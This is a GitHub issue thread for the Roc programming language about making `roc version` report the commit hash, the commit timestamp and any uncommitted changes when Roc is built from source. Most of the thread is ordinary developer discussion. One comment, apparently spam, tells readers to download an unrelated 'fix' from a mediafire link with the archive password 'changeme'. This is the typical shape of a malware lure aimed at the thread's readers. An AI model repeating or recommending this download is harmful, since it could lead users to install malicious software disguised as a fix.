### ISSUE TITLE
building from source should set `roc version`

### ISSUE THREAD

**Issue by Anton-4** [roc-lang/roc#7030]
If you build Roc from source and execute `roc version` you'll get the default value "built-from-source".
It would be nice to print some useful info:

   For those without git changes we can print the last commit hash and date of the commit:

   built from commit faeea52, with commit timestamp Fri Aug 23 09:02:06 UTC 2024

   And with changes:

   built from commit faeea52 **with additional changes**. Commit timestamp: Fri Aug 23 09:02:06 UTC 2024

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Hasnep** [comment]
I think I'd like to tackle this issue if nobody else has already started :)

**Comment by lukewilliamboswell** [comment]
@Anton-4 @Hasnep just wanted to check if this Issue is fully resolved. It looks good to me, but not sure about the intent behind the **with additional changes** part of the description.

**Comment by Hasnep** [comment]
Yes, this can be closed, the "with additional changes" message is for when the git head being built from is dirty, i.e. there are uncommitted changes.
